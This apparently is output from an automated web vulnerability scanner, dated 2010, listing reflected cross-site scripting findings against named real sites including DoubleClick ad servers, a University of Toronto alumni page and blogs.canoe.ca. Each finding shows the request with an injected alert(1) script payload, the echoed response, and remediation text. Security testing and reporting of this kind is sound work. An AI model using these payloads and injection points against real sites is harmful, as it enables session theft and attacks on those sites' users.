GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1472d0'-alert(1)-'dbef4414a82&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 25 Nov 2010 03:21:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... HuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1472d0'-alert(1)-'dbef4414a82&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssit ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afd99'-alert(1)-'ef559114c82 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iAafd99'-alert(1)-'ef559114c82&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 25 Nov 2010 03:21:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iAafd99'-alert(1)-'ef559114c82&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssiteid%3D1004575%26csdartid%3D560302043923 ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55a7b"-alert(1)-"b3463074281 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA55a7b"-alert(1)-"b3463074281&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 25 Nov 2010 03:21:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA55a7b"-alert(1)-"b3463074281&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssiteid%3D1004575%26csdartid%3D560302043923 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50534"-alert(1)-"1d4619175ce was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L50534"-alert(1)-"1d4619175ce&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 25 Nov 2010 03:19:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a5d/f/1a2/%2a/h%3B232397559%3B0-0%3B0%3B56030204%3B2321-160/600%3B39232393/39250180/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L50534"-alert(1)-"1d4619175ce&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxl ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41b57'-alert(1)-'2099f4d7dba was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L41b57'-alert(1)-'2099f4d7dba&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 25 Nov 2010 03:20:02 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a5d/f/1a2/%2a/h%3B232397559%3B0-0%3B0%3B56030204%3B2321-160/600%3B39232393/39250180/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L41b57'-alert(1)-'2099f4d7dba&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxl ...[SNIP]...
2.13. http://adc2.adcentriconline.com/adcentric/form/1679/2/48846 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adc2.adcentriconline.com
Path:
/adcentric/form/1679/2/48846
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8962"><script>alert(1)</script>0a731728c7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adcentric/form/1679/2/48846?a8962"><script>alert(1)</script>0a731728c7e=1 HTTP/1.1 Host: adc2.adcentriconline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ADCUserID=NkDrm5M4SVIi4zZ; 1679-1-48846=12370;
The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 9acf1%0aalert(1)//235da456126 was submitted in the url parameter. This input was echoed as 9acf1 alert(1)//235da456126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml9acf1%0aalert(1)//235da456126&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBRTc0M9TtTK24PM27sQfBmJSNAba1nskBoI-lohHAjbcBgJciEAEYASCp2qQSOABQm9vQugFgyYbtiISk7A-gAcSR-u4DsgEVd3d3Lm1vbnRyZWFsa2lvc2suY29tugEJNzI4eDkwX2FzyAEJ2gEdaHR0cDovL3d3dy5tb250cmVhbGtpb3NrLmNvbS-4AhjIArbkuROoAwHoA_Yo6APEBegDiCnoA_MH9QMAQADE%26num%3D1%26ggladgrp%3D7500698640161137384%26gglcreat%3D8587149626781171265%26sig%3DAGiWqtwSH_uwjfyq_9ry7bUkk1wsJ734Bw%26client%3Dca-pub-1921508190133428%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBRTc0M9TtTK24PM27sQfBmJSNAba1nskBoI-lohHAjbcBgJciEAEYASCp2qQSOABQm9vQugFgyYbtiISk7A-gAcSR-u4DsgEVd3d3Lm1vbnRyZWFsa2lvc2suY29tugEJNzI4eDkwX2FzyAEJ2gEdaHR0cDovL3d3dy5tb250cmVhbGtpb3NrLmNvbS-4AhjIArbkuROoAwHoA_Yo6APEBegDiCnoA_MH9QMAQADE%26sigh%3DG4ZCsaj2ST4%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=montreal%20accommodations&up_city=Boston&up_region=US-MA&up_lat=42.36&up_long=-71.06\ HTTP/1.1 Host: ads.gmodules.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Date: Thu, 25 Nov 2010 03:33:32 GMT Expires: Thu, 25 Nov 2010 03:33:32 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
Unable to retrieve spec for http://www.ljmsite.com/google/gadgetads/kayakhotel/728x90.xml9acf1 alert(1)//235da456126. HTTP error 400
The value of the gid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31e5d'-alert(1)-'fdc12b29cb was submitted in the gid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /s/731/index.aspx?sid=731&gid=3631e5d'-alert(1)-'fdc12b29cb&pgid=8&cid=46 HTTP/1.1 Host: alumni.utoronto.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=168379761.1290653903.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=168379761.1501729055.1290653903.1290653903.1290653903.1; __utmc=168379761; __utmb=168379761.1.10.1290653903; AL_LastUpdated=11/24/2010 8:58:24 PM;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 03:34:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: AL_LastUpdated=11/24/2010 9:34:21 PM; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35640
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <![CDATA[
RedirectUrl = 'http://alumni.utoronto.ca/s/731/index.aspx?sid=731&gid=3631e5d'-alert(1)-'fdc12b29cb&pgid=3&cid=421'; CanRedirect = true; jQuery(document).ready(function() { var cookiesEnabled = false; var TEST_COOKIE = 'test_cookie'; jQuery.cookie( TEST_COOKIE, true ); if ( jQuery.cookie ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9253'-alert(1)-'bf9bf44c49b was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /s/731/index.aspx?sid=731b9253'-alert(1)-'bf9bf44c49b&gid=36&pgid=8&cid=46 HTTP/1.1 Host: alumni.utoronto.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=168379761.1290653903.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=168379761.1501729055.1290653903.1290653903.1290653903.1; __utmc=168379761; __utmb=168379761.1.10.1290653903; AL_LastUpdated=11/24/2010 8:58:24 PM;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 03:34:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: AL_LastUpdated=11/24/2010 9:34:07 PM; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 29105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <![CDATA[
RedirectUrl = 'http://alumni.utoronto.ca/s/731/index.aspx?sid=731b9253'-alert(1)-'bf9bf44c49b&gid=36&pgid=3&cid=421'; CanRedirect = true; jQuery(document).ready(function() { var cookiesEnabled = false; var TEST_COOKIE = 'test_cookie'; jQuery.cookie( TEST_COOKIE, true ); if ( jQuery ...[SNIP]...
2.17. http://blogs.canoe.ca/autonet/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blogs.canoe.ca
Path:
/autonet/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2712"><script>alert(1)</script>b1948fbcb83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2712\"><script>alert(1)</script>b1948fbcb83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autonet/?b2712"><script>alert(1)</script>b1948fbcb83=1 HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache ServerID: blogswordpress-prod-fe-03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 50479 Date: Thu, 25 Nov 2010 03:34:41 GMT X-Varnish: 1749439543 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-01 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/autonet/?b2712\"><script>alert(1)</script>b1948fbcb83=1"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a478"><script>alert(1)</script>7dbc33121e8 was submitted in the REST URL parameter 2. This input was echoed as 7a478\"><script>alert(1)</script>7dbc33121e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /canoedossier/media-matters7a478"><script>alert(1)</script>7dbc33121e8/internet-overload/ HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Link: <http://blogs.canoe.ca/canoedossier/?p=29011>; rel=shortlink ServerID: blogswordpress-prod-fe-03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 51002 Date: Thu, 25 Nov 2010 03:34:44 GMT X-Varnish: 1749439634 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-01 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/canoedossier/media-matters7a478\"><script>alert(1)</script>7dbc33121e8/internet-overload/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 201de"><script>alert(1)</script>67b7a76f5af was submitted in the REST URL parameter 3. This input was echoed as 201de\"><script>alert(1)</script>67b7a76f5af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /canoedossier/media-matters/internet-overload201de"><script>alert(1)</script>67b7a76f5af/ HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 25 Nov 2010 03:34:46 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache ServerID: blogswordpress-prod-fe-01 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 36359 Date: Thu, 25 Nov 2010 03:34:46 GMT X-Varnish: 136324858 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-02 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/canoedossier/media-matters/internet-overload201de\"><script>alert(1)</script>67b7a76f5af/"/> ...[SNIP]...
2.20. http://blogs.canoe.ca/canoedossier/media-matters/internet-overload/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blogs.canoe.ca
Path:
/canoedossier/media-matters/internet-overload/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8092"><script>alert(1)</script>6280b21678b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8092\"><script>alert(1)</script>6280b21678b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /canoedossier/media-matters/internet-overload/?e8092"><script>alert(1)</script>6280b21678b=1 HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Link: <http://blogs.canoe.ca/canoedossier/?p=29011>; rel=shortlink ServerID: blogswordpress-prod-fe-01 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 51008 Date: Thu, 25 Nov 2010 03:34:43 GMT X-Varnish: 136324764 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-02 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/canoedossier/media-matters/internet-overload/?e8092\"><script>alert(1)</script>6280b21678b=1"/> ...[SNIP]...
2.21. http://blogs.canoe.ca/canoetech/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blogs.canoe.ca
Path:
/canoetech/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1d5c"><script>alert(1)</script>846a8300d21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1d5c\"><script>alert(1)</script>846a8300d21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /canoetech/?f1d5c"><script>alert(1)</script>846a8300d21=1 HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache ServerID: blogswordpress-prod-fe-03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 67380 Date: Thu, 25 Nov 2010 03:34:40 GMT X-Varnish: 1749439514 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: blogswordpress-prod-rp-01 X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://blogs.canoe.ca/canoetech/?f1d5c\"><script>alert(1)</script>846a8300d21=1"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1691"><script>alert(1)</script>d8026cbd7ed was submitted in the REST URL parameter 2. This input was echoed as e1691\"><script>alert(1)</script>d8026cbd7ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ent/generale1691"><script>alert(1)</script>d8026cbd7ed/cookie-monster-lobbies-for-snl-gig/ HTTP/1.1 Host: blogs.canoe.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
